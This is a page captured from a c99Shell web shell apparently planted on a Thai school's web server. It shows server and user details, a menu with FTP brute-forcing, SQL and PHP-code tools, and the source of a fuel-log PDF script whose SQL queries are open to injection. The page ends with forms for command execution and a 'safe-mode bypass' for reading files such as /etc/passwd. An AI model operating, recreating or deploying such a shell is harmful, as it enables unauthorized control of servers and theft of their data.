!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 52.64 GB of 127.8 GB (41.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prePrintCarOil2.php (16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
tech_plan_tb */ $query1 = " SELECT * FROM $myTable2 WHERE carId='$carId' AND Teacher_code='$Teacher_code' "; $result1 = $dbObj->execQuery($query1); $rs1 = $dbObj->fetchArray($result1); // find เชื้อเพลิงง autocar_tb $query11 = " SELECT * FROM autocar_tb WHERE carId='$carId' "; $result11 = $dbObj->execQuery($query11); $rs11 = $dbObj->fetchArray($result11); //-------------- $query = " SELECT * FROM formcaroffice Where Teacher_code='$Teacher_code' Group By CarNo "; $result = $dbObj->execQuery($query); $rs3 = $dbObj->fetchArray($result); //$Teacher_code = $rss['Teacher_code']; /** Table --> techplan_method_tb */ $query2 = " SELECT * FROM $myTable3 WHERE ProvinceId='$rs1[ProvinceId]' "; $result2 = $dbObj->execQuery($query2); $rs2 = $dbObj->fetchArray($result2); //--------------- $query = " SELECT * FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result5 = $dbObj->execQuery($query); $numrows = $dbObj->_numrows; //--------------- function getMonthTh($mm) { if($mm=='01') { $mm='มกราคม'; } else if($mm=='02') { $mm='กุมภาพันธ์'; } else if($mm=='03') { $mm='มีนาคม'; } else if($mm=='04') { $mm='เมษายน'; } else if($mm=='05') { $mm='พฤษภาคม';} else if($mm=='06') { $mm='มิถุนายน'; } else if($mm=='07') { $mm='กรกฎาคม'; } else if($mm=='08') { $mm='สิงหาคม'; } else if($mm=='09') { $mm='กันยายน'; } else if($mm=='10') { $mm='ตุลาคม';} else if($mm=='11') { $mm='พฤศจิกายน';} else if($mm=='12') { $mm='ธันวาคม'; } return "$mm"; } function getShortMonthTh($mm) { if($mm=='01') { $mm='ม.ค.'; } else if($mm=='02') { $mm='ก.พ.'; } else if($mm=='03') { $mm='มี.ค.'; } else if($mm=='04') { $mm='เม.ย.'; } else if($mm=='05') { $mm='พ.ค.';} else if($mm=='06') { $mm='มิ.ย.'; } else if($mm=='07') { $mm='ก.ค.'; } else if($mm=='08') { $mm='ส.ค.'; } else if($mm=='09') { $mm='ก.ย.'; } else if($mm=='10') { $mm='ต.ค.';} else if($mm=='11') { $mm='พ.ย.';} else if($mm=='12') { $mm='ธ.ค.'; } return "$mm"; } //Create new pdf file $pdf = new FPDF('L' , 'mm' , 'A4'); //Set thai font $pdf->SetThaiFont(); $pdf->AddPage(); //-- Load Form Image to Background $pdf->Image('../form/caroil2.jpg', 0, 0, 297, 210); //-- Set Font $pdf->SetFont('AngsanaNew','',13); //-- ที่ if(!empty($CarNo)){ $pdf->SetXY(22,33.5); $pdf->Cell(45,5,$CarNo,0,0,'C'); } else{ $pdf->SetXY(22,33.5); $pdf->Cell(45,5,'-',0,0,'C'); } //-- วันที่ขอใช้รถ วันที่ $query1 = " SELECT * FROM formcaroffice WHERE CarNo='$CarNo' "; $result1 = $dbObj->execQuery($query1); $rs = $dbObj->fetchObject($result1); $sday = $rs->Date_start ; $yearthai = explode("-",$sday); $day = intval($yearthai[2]); $month = getMonthTh(intval($yearthai[1])); $year = intval($yearthai[0]+543); if(!empty($day)){ $pdf->SetXY(105,33.5); $pdf->Cell(20,5,"$day "." "." $month "." "." $year",0,0,'C'); } else{ $pdf->SetXY(105,33.5); $pdf->Cell(20,5,'-',0,0,'C'); } //-- สิ้นสุดวันที่ $sday = $rs->Date_finish; $yearthai = explode("-",$sday); $day = intval($yearthai[2]); $month = getMonthTh(intval($yearthai[1])); $year = intval($yearthai[0]+543); if(!empty($day)){ $pdf->SetXY(160,33.5); $pdf->Cell(20,5,"$day "." "." $month "." "." $year",0,0,'C'); } else{ $pdf->SetXY(105,33.5); $pdf->Cell(20,5,'-',0,0,'C'); } //-- เวลาออกเดินทาง $Time_start = $rs->Time_start; if(!empty($Time_start)){ $pdf->SetXY(218,33.5); $pdf->Cell(10,5,$Time_start,0,0,'C'); } else{ $pdf->SetXY(218,33.5); $pdf->Cell(10,5,'-',0,0,'C'); } //-- เวลาถึง $Time_finish = $rs->Time_finish; if(!empty($Time_finish)){ $pdf->SetXY(260.5,33.5); $pdf->Cell(10,5,$Time_finish,0,0,'C'); } else{ $pdf->SetXY(260.5,33.5); $pdf->Cell(10,5,'-',0,0,'C'); } //-- ชื่อผู้ขอใช้ $Teacher_code = $Teacher_code ; $sql11 = " Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code='$Teacher_code' "; $result11 = mysql_query($sql11); $rs11 = mysql_fetch_array($result11); if(!empty($Teacher_code)){ $pdf->SetXY(42,40); $pdf->Cell(30,5,$rs11[First_name]." ".$rs11[Teacher_name]." ".$rs11[Teacher_lastname],0,0,'C'); } else{ $pdf->SetXY(42,40); $pdf->Cell(30,5,'-',0,0,'C'); } //-- เพื่อ $Training_name = $rs->Training_name; $cutstr = substr($Training_name,0,70); if(!empty($Training_name)){ $pdf->SetXY(141.5,40); if(strlen($Training_name)>70) { $pdf->Cell(80,5,$cutstr.'--',0,0,'C'); } else { $pdf->Cell(80,5,$cutstr,0,0,'C'); } } else{ $pdf->SetXY(141.5,40); $pdf->Cell(80,5,'-',0,0,'C'); } //-- จังหวัด $query2 = " SELECT * FROM $myTable3 WHERE provinceId='$rs3[provinceId]' "; $result2 = $dbObj->execQuery($query2); $rs2 = $dbObj->fetchArray($result2); if(!empty($rs2[provinceName])){ $pdf->SetXY(243,40); $pdf->Cell(30,5,$rs2[provinceName],0,0,'C'); } else{ $pdf->SetXY(243,40); $pdf->Cell(30,5,'-',0,0,'C'); } //-- เลขหน้าปัทม์ $sql = " SELECT min(Mile_start) Mile_start FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql); $rss = mysql_fetch_array($result1); if(!empty($rss['Mile_start'])){ $pdf->SetXY(57,46.5); $pdf->Cell(15,5,number_format($rss['Mile_start'],'','',','),0,0,'C'); } else{ $pdf->SetXY(57,46.5); $pdf->Cell(15,5,'-',0,0,'C'); } //-- ถึงเลขหน้าปัทม์ $sql = " SELECT max(Mile_finish) Mile_finish FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql); $rss = mysql_fetch_array($result1); if(!empty($rss['Mile_finish'])){ $pdf->SetXY(112,46.5); $pdf->Cell(15,5,number_format($rss['Mile_finish'],'','',','),0,0,'C'); } else{ $pdf->SetXY(112,46.5); $pdf->Cell(15,5,'-',0,0,'C'); } //-- รวมระยะทาง $sql1 = " SELECT SUM(Num_Mile) AS SumB4 FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB4'])){ $pdf->SetXY(155.5,46.5); $pdf->Cell(15,5,number_format($rss1['SumB4'],'','',',')." กม.",0,0,'C'); } else{ $pdf->SetXY(155.5,46.5); $pdf->Cell(15,5,'-',0,0,'C'); } //-- จำนวนค่าเชื้อเพลิง $sql1 = " SELECT SUM(Num_Lish) AS SumB5 FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB5'])){ $pdf->SetXY(205,46.5); $pdf->Cell(15,5,number_format($rss1['SumB5'],'','',','),0,0,'C'); } else{ $pdf->SetXY(205,46.5); $pdf->Cell(15,5,'-',0,0,'C'); } //-- เป็นเงิน $sql1 = " SELECT SUM(PriceOill) AS SumB6 FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); if(!empty($rss1['SumB6'])){ $pdf->SetXY(248,46.5); $pdf->Cell(15,5,number_format($rss1['SumB6'],'2','.',','),0,0,'C'); } else{ $pdf->SetXY(248,46.5); $pdf->Cell(15,5,'-',0,0,'C'); } //-- คอลัมน์เวลา if($numrows){ $i = 1; while( $rs7 = $dbObj->fetchArray($result5) ) { //--------------------------------------------- $sday = $rs7['DateCar']; $yearthai = explode("-",$sday); $day = intval($yearthai[2]); $month = getMonthTh(intval($yearthai[1])); $year = intval($yearthai[0]+543); //--------------------------------------------- $CarmoId = $rs7["CarmoId"]; $sql = "Select * From automobile_tb Where CarmoId ='$CarmoId'"; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result1); //--------------------------------------------- $query11 = " SELECT * FROM autocar_tb WHERE carId='$rs7[carId]' "; $result11 = $dbObj->execQuery($query11); $rs11 = $dbObj->fetchArray($result11); $sday1 = $rs11['DateCar']; $yearthai1 = explode("-",$sday1); $day1 = intval($yearthai1[2]); $month1 = intval($yearthai1[1]); $year1 = intval($yearthai1[0]+543); $m1 = getShortMonthTH($month1); //--------------------------------------------- $name1 = $rs7["name1"]; $sql = "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'"; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs33 = mysql_fetch_array($result1); //--------------------------------------------- switch($i){ case "1" : $pdf->Text(34,77.5,"$day"." "."$month"." "."$year"); $pdf->Text(63,77.5,$rs7['Time_start']." น."); $pdf->Text(80,77.5,$rs2['CodeNo']); $pdf->Text(112,77.5,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,77.5,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,77.5,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,77.5,$rs7['Num_Mile']); $pdf->Text(220,77.5,$rs7['Num_Lish']); $pdf->Text(240,77.5,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "2" : $pdf->Text(34,84,"$day"." "."$month"." "."$year"); $pdf->Text(63,84,$rs7['Time_start']." น."); $pdf->Text(80,84,$rs2['CodeNo']); $pdf->Text(112,84,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,84,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,84,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,84,$rs7['Num_Mile']); $pdf->Text(220,84,$rs7['Num_Lish']); $pdf->Text(240,84,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "3" : $pdf->Text(34,91,"$day"." "."$month"." "."$year"); $pdf->Text(63,91,$rs7['Time_start']." น."); $pdf->Text(80,91,$rs2['CodeNo']); $pdf->Text(112,91,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,91,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,91,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,91,$rs7['Num_Mile']); $pdf->Text(220,91,$rs7['Num_Lish']); $pdf->Text(240,91,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "4" : $pdf->Text(34,98,"$day"." "."$month"." "."$year"); $pdf->Text(63,98,$rs7['Time_start']." น."); $pdf->Text(80,98,$rs2['CodeNo']); $pdf->Text(112,98,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,98,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,98,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,98,$rs7['Num_Mile']); $pdf->Text(220,98,$rs7['Num_Lish']); $pdf->Text(240,98,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "5" : $pdf->Text(34,104.5,"$day"." "."$month"." "."$year"); $pdf->Text(63,104.5,$rs7['Time_start']." น."); $pdf->Text(80,104.5,$rs2['CodeNo']); $pdf->Text(112,104.5,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,104.5,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,104.5,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,104.5,$rs7['Num_Mile']); $pdf->Text(220,104.5,$rs7['Num_Lish']); $pdf->Text(240,104.5,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "6" : $pdf->Text(34,111,"$day"." "."$month"." "."$year"); $pdf->Text(63,111,$rs7['Time_start']." น."); $pdf->Text(80,111,$rs2['CodeNo']); $pdf->Text(112,111,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,111,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,111,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,111,$rs7['Num_Mile']); $pdf->Text(220,111,$rs7['Num_Lish']); $pdf->Text(240,111,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "7" : $pdf->Text(34,117.5,"$day"." "."$month"." "."$year"); $pdf->Text(63,117.5,$rs7['Time_start']." น."); $pdf->Text(80,117.5,$rs2['CodeNo']); $pdf->Text(112,117.5,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,117.5,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,117.5,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,117.5,$rs7['Num_Mile']); $pdf->Text(220,117.5,$rs7['Num_Lish']); $pdf->Text(240,117.5,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "8" : $pdf->Text(34,124,"$day"." "."$month"." "."$year"); $pdf->Text(63,124,$rs7['Time_start']." น."); $pdf->Text(80,124,$rs2['CodeNo']); $pdf->Text(112,124,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,124,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,124,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,124,$rs7['Num_Mile']); $pdf->Text(220,124,$rs7['Num_Lish']); $pdf->Text(240,124,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "9" : $pdf->Text(34,131,"$day"." "."$month"." "."$year"); $pdf->Text(63,131,$rs7['Time_start']." น."); $pdf->Text(80,131,$rs2['CodeNo']); $pdf->Text(112,131,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,131,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,131,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,131,$rs7['Num_Mile']); $pdf->Text(220,131,$rs7['Num_Lish']); $pdf->Text(240,131,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; case "10" : $pdf->Text(34,138,"$day"." "."$month"." "."$year"); $pdf->Text(63,138,$rs7['Time_start']." น."); $pdf->Text(80,138,$rs2['CodeNo']); $pdf->Text(112,138,number_format($rs7['Mile_start'],'','',',')); $pdf->Text(135,138,"$day1"." "."$m1"." "."$year1"); $pdf->Text(165,138,number_format($rs7['Mile_finish'],'','',',')); $pdf->Text(197,138,$rs7['Num_Mile']); $pdf->Text(220,138,$rs7['Num_Lish']); $pdf->Text(240,138,$rs33['First_name']." ".$rs33['Teacher_name']." ".$rs33['Teacher_lastname']); break; } $i++; } } $pdf->SetFont('AngsanaNew','B',13); //-------------------- $sql = " SELECT min(Mile_start) Mile_start FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql); $rss = mysql_fetch_array($result1); $pdf->SetXY(110,140); $pdf->Cell(15,5,number_format($rss['Mile_start'],'','',','),0,0,'C'); //-------------------- $sql = " SELECT max(Mile_finish) Mile_finish FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql); $rss = mysql_fetch_array($result1); $pdf->SetXY(163,140); $pdf->Cell(15,5,number_format($rss['Mile_finish'],'','',','),0,0,'C'); //-------------------- $sql1 = " SELECT SUM(Num_Mile) AS SumB4 FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); $pdf->SetXY(193,140); $pdf->Cell(15,5,number_format($rss1['SumB4'],'','',','),0,0,'C'); //-------------------- $sql1 = " SELECT SUM(Num_Lish) AS SumB5 FROM autocar_tb at , formcaroffice fc WHERE at.carId=fc.carId and fc.CarNo='$CarNo' "; $result1 = mysql_query($sql1); $rss1 = mysql_fetch_array($result1); $pdf->SetXY(216,140); $pdf->Cell(15,5,number_format($rss1['SumB5'],'','',','),0,0,'C'); //-------------------- //Create file $pdf->Output(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--